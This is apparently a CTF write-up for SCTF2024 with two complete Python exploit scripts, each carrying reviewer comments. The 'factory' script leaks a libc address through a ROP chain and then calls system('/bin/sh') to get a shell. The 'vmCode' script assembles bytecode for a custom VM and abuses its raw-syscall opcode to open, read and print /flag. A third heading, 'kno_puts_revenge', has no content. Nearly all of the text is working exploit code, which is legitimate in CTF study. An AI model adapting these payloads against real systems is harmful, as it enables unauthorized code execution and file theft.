SCTF2024

factory

#!/usr/bin/env python3
from pwncli import *
from ctypes import *  # NOTE(review): second wildcard import; ctypes rebinds any name both modules export — none of the helpers used below (ru/sla/u64_ex/CG/log) are ctypes names
from time import time  # unused in this script (template residue)
from struct import pack  # unused in this script (template residue)
cli_script() # pwncli script mode: must be called explicitly; it parses argv and fills `gift` before anything below reads it

# Everything below is taken from `gift`, which cli_script() populated.
io = gift['io'] # process or remote object
elf = gift["elf"] # ELF object, ELF("./pwn")
libc = gift.libc # ELF object, ELF("./libc.so.6")
filename = gift.filename # current filename (not referenced again in this script)
is_debug = gift.debug # is debug or not (not referenced again in this script)
is_remote = gift.remote # is remote or not (not referenced again in this script)
gdb_pid = gift.gdb_pid # gdb pid if debug (not referenced again in this script)

arch='amd64'
context(log_level = 'debug',os='linux',arch=arch)
if gift.remote:
    libc = ELF("./libc.so.6")
    gift['libc'] = libc
    # The libc supplied by the remote target can differ from the local one; when running against the target, swap in the remote libc.
    pass
libc_box = LibcBox() # LibcBox object (not referenced again in this script)

# Host libc handle seeded with srand(0); nothing in this script calls rand() through r_l, so this is template residue.
r_l = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
r_l.srand(0)
# - - - - - - - - - - - - - #
# Gadget / PLT / GOT addresses used by pwn_exp().  The fixed 0x40xxxx values
# presumably mean the binary is not PIE (confirm with checksec); PIE would
# randomise these per run — the mitigation whose absence this chain relies on.
pop_rdi = 0x0000000000401563
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
ret = 0x000000000040101a
# - - - - - - - - - - - - - #
def ss(c):
    """Answer one ``factory ... =`` prompt with the decimal form of *c*.

    Waits until the text "factory" has arrived, then replies to the "="
    prompt with ``str(c)`` (sla = send a line after the delimiter).
    """
    ru("factory")
    answer = str(c)
    sla("=", answer)
# - - - - - - - - - - - - - #
def pwn_exp():
    """Drive the two-round ROP exchange through the "factory" prompts.

    Round 1 sends 22 filler values, then ``pop rdi; puts@got; puts@plt``
    followed by a return to 0x401303, and reads the 6 leaked bytes to set
    ``libc.address``.  Round 2 sends the same filler, then
    ``ret; pop rdi; "/bin/sh"; system``.  Every value is delivered by
    ss(), one prompt at a time.

    NOTE(review): the pasted source lost its indentation, so each ``for``
    loop is read as covering only the first ss() call after it, and the
    trailing log calls are read as the tail of this function.
    """
    print('PWN')
    sla("How many factorys do you want to build: ", str(40))

    filler = [0x33333333] * 22   # 22 throw-away slots ahead of each chain
    trailer = [0x33333333] * 7   # 7 throw-away slots after each chain

    # Round 1: leak the runtime address of puts via puts@plt(puts@got).
    leak_chain = [28, pop_rdi, puts_got, puts_plt, 0x401303]
    for value in filler + leak_chain + trailer:
        ss(value)

    # Skip to the newline, then take the next 6 bytes as the leaked pointer.
    ru('\x0a')
    puts_Addr = u64_ex(io.recv(6))
    libc.address = puts_Addr - libc.symbols['puts']

    # Round 2: system("/bin/sh") with the string located inside libc;
    # the leading ``ret`` is presumably for stack alignment.
    CG.set_find_area(find_in_libc=True, find_in_elf=False)
    shell_chain = [28, ret, pop_rdi, CG.bin_sh(), libc.symbols['system']]
    for value in filler + shell_chain + trailer:
        ss(value)

    log.info('#---#---#---#---#')
    log.success('libc.address:' + hex(libc.address))

if __name__ == '__main__':
    # Run both ROP rounds, then hand the tube over for interactive use.
    pwn_exp()
    io.interactive()

vmCode

#!/usr/bin/env python3
from pwncli import *
from ctypes import *  # NOTE(review): second wildcard import; ctypes rebinds any name both modules export — none of the helpers used below (sa/sl/log) are ctypes names
from time import time  # unused in this script (template residue)
from struct import pack  # unused in this script (template residue)
cli_script() # pwncli script mode: must be called explicitly; it parses argv and fills `gift` before anything below reads it

# Everything below is taken from `gift`, which cli_script() populated.
io = gift['io'] # process or remote object
elf = gift["elf"] # ELF object, ELF("./pwn") (only io is referenced again in this script)
libc = gift.libc # ELF object, ELF("./libc.so.6")
filename = gift.filename # current filename (not referenced again in this script)
is_debug = gift.debug # is debug or not (not referenced again in this script)
is_remote = gift.remote # is remote or not (not referenced again in this script)
gdb_pid = gift.gdb_pid # gdb pid if debug (not referenced again in this script)

arch='amd64'
context(log_level = 'debug',os='linux',arch=arch)
if gift.remote:
    #libc = ELF("./libc.so.6")
    gift['libc'] = libc  # with the line above commented out this writes back the same object read from gift.libc — effectively a no-op
    # The libc supplied by the remote target can differ from the local one; when running against the target, swap in the remote libc.
    pass
libc_box = LibcBox() # LibcBox object (not referenced again in this script)

# Host libc handle seeded with srand(0); nothing in this script calls rand() through r_l, so this is template residue.
r_l = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
r_l.srand(0)
# - - - - - - - - - - - - - #
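# Author's notes on how the VM dispatches (translated; not verified here):
#   the return address is controlled through rax, as an offset from 0x123a
#   code_ = [code + rsi]                      # rsi_base = 0x41
#   ret_addr = [0x2020 + (code_ - 0x21) * 2] + 0x123a
#   rdi is the offset into the VM stack       # rdi_base = 1
opt = b''  # bytecode being assembled; every emitter below appends one opcode byte
# - - - - - - - - - - - - - #


def _emit(opcode: bytes) -> None:
    """Append one opcode to the module-level bytecode buffer ``opt``.

    All sub_* emitters funnel through here so the append logic lives in
    one place; ``opt`` is rebound (bytes is immutable), hence ``global``.
    """
    global opt
    opt += opcode


def sub_1274() -> None:
    """No-op: the author's original declared ``global opt`` and emitted nothing.

    By position it presumably corresponds to the opcode before 0x22
    (0x21 under the ``code_ - 0x21`` dispatch formula above) — unverified.
    """


def sub_1299() -> None:
    """Emit 0x22 — author's reading: ``rdi--; rsi = stack[rdi]``."""
    _emit(b'\x22')


def sub_12a7() -> None:
    """Emit 0x23 — author's reading: ``stack[rdi-2] ^= stack[rdi-1]; rdi--``."""
    _emit(b'\x23')


def sub_12c4() -> None:
    """Emit 0x24 — author's reading: swap ``stack[rdi-1]`` and ``stack[rdi-3]``."""
    _emit(b'\x24')


def sub_12e0() -> None:
    """Emit 0x25 — author's reading: swap ``stack[rdi-1]`` and ``stack[rdi-2]``."""
    _emit(b'\x25')


def sub_12fc() -> None:
    """Emit 0x26 — author's reading: ``stack[rdi] = code[rsi]; rsi += 4; rdi++`` (push immediate)."""
    _emit(b'\x26')


def sub_1319() -> None:
    """Emit 0x27 — author's reading: ``stack[rdi-1] &= 0xff``."""
    _emit(b'\x27')


def sub_132e() -> None:
    """Emit 0x28 — author's reading: ``rdi--``."""
    _emit(b'\x28')


def sub_1332() -> None:
    """Emit 0x29 — author's reading: ``stack[rdi-1] >> 8``."""
    _emit(b'\x29')


def sub_1348() -> None:
    """Emit 0x2a — author's reading: ``stack[rdi] = stack[rdi-1]; rdi++``."""
    _emit(b'\x2a')


def sub_135c() -> None:
    """Emit 0x2b — author's reading: ``stack[rdi-1] << 8``."""
    _emit(b'\x2b')


def sub_1372() -> None:
    """Emit 0x2c — author's reading of the conditional jump.

    ``rdi == 0`` -> ``rsi += 2; ret``;
    ``rdi != 0`` -> ``ax = code[rsi]; rsi += 2; rsi = (rsi + ax) & 0xff; ret``.
    """
    _emit(b'\x2c')


def sub_13a3() -> None:
    """Emit 0x2d — author's reading: ``stack[rdi-2] >> (stack[rdi-1] & 0xff); rdi--``."""
    _emit(b'\x2d')


def sub_13c0() -> None:
    """Emit 0x2e — author's reading: ``stack[rdi-2] << (stack[rdi-1] & 0xff); rdi--``."""
    _emit(b'\x2e')


def sub_13dd() -> None:
    """Emit 0x2f — author's reading: ``stack[rdi-2] &= stack[rdi-1]; rdi--``."""
    _emit(b'\x2f')


def sub_13fa() -> None:
    """Emit 0x30 — author's reading: the VM's syscall opcode.

    ``rax = stack[rdi-1]; rdi_ = stack[rdi-2]; rsi_ = stack[rdi-3];
    rdx = stack[rdi-4]; syscall; rdi -= 3; stack[rdi-1] = rax``.
    From a hardening standpoint this is the opcode that hands raw syscall
    control to the bytecode; a VM that exposes it without a number/argument
    allow-list cannot confine the program it runs.
    """
    _emit(b'\x30')


def sub_1425() -> None:
    """Emit 0x31 — author's reading: ``stack[rdi] = stack[rdi-1]; rdi++``."""
    _emit(b'\x31')


def sub_1439() -> None:
    """Emit 0x32 — author's reading: ``stack[rdi] = code + rsi; rdi++``."""
    _emit(b'\x32')


def exit() -> None:
    """Emit 0x33 (the author's 'exit' opcode).

    NOTE(review): this shadows the builtin ``exit`` for the rest of the
    module; the name is kept so existing callers keep working.
    """
    _emit(b'\x33')


# Author's notes on the VM's initial state (not verified here):
#   stack = 0x4460
#   code  = 0x4040
#   rsi   = 0x41
#   rdi   = 1
# - - - - - - - - - - - - - #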
# - - - - - - - - - - - - - #
def pwn_exp():
    """Assemble the VM program by hand, pad it, and send it in two pieces.

    The four stages are the author's raw opcode sequences (the sub_*
    emitters above are not used here); each carries the author's own
    annotation of the syscall it is meant to perform.  The buffer is
    padded to 0x13f bytes with 'A' and ``b'flag\\x00\\x00\\x00'`` is
    appended; the first 0x3f bytes answer the "shellcode:" prompt and the
    remainder is sent as a separate line.

    NOTE(review): the pasted source lost its indentation; the trailing
    log calls are read as the tail of this function.  ``libc.address``
    is never set in this script, so the log line prints the default.
    """
    global opt
    print('PWN')
    stages = [
        # author: read(0, code+0x41+0x39, 0x200)
        b'\x26\x00\x02\x00\x00\x32\x26\x47\x00\x00\x00\x23\x26\x00\x00\x00\x00\x26\x00\x00\x00\x00\x30',
        # author: open(/flag)
        b'\x26\x00\x00\x00\x00\x26\x00\x00\x00\x00\x32\x26\x63\x01\x00\x00\x23\x26\x02\x00\x00\x00\x30',
        # author: read(3, code+0x300, 0x30)
        b'\x26\x30\x00\x00\x00\x32\x26\xb5\x03\x00\x00\x23\x26\x03\x00\x00\x00\x26\x00\x00\x00\x00\x30',
        # author: write(1, code+0x300, 0x30)
        b'\x26\x30\x00\x00\x00\x32\x26\xcc\x03\x00\x00\x23\x26\x01\x00\x00\x00\x26\x01\x00\x00\x00\x30',
    ]
    opt += b''.join(stages)
    opt = opt.ljust(0x100 + 0x3f, b'A') + b'flag\x00\x00\x00'
    head, tail = opt[:0x3f], opt[0x3f:]
    sa("shellcode:", head)
    sl(tail)

    log.info('#---#---#---#---#')
    log.success('libc.address:' + hex(libc.address))

if __name__ == '__main__':
    # Send the assembled VM program, then hand the tube over for interactive use.
    pwn_exp()
    io.interactive()

kno_puts_revenge